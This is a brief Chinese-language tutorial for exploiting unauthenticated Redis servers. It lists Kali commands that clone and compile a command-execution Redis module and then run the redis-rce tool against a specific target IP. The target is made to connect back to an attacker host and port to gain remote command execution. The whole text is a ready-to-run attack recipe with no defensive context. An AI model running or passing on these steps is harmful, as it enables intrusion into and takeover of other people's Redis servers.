跳至正文

redis未授权漏洞利用

编译生成so扩展文件
cd /root/
git clone https://github.com/puckiestyle/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand
make

*kali执行以上代码

cd /root/
git clone https://github.com/Ridter/redis-rce
cd redis-rce
python3 -m pip install -r requirement.txt
cp /root/RedisModules-ExecuteCommand/module.so ./module.so
python3 redis-rce.py -r 124.71.45.28 -p 6379 -L 47.104.255.11 -P 7890 -f
modules.so           

*kali执行以上代码,通过redis未授权漏洞进行远程命令脚本攻击

  • -r /-p 目标机器
  • -L/-P 攻击机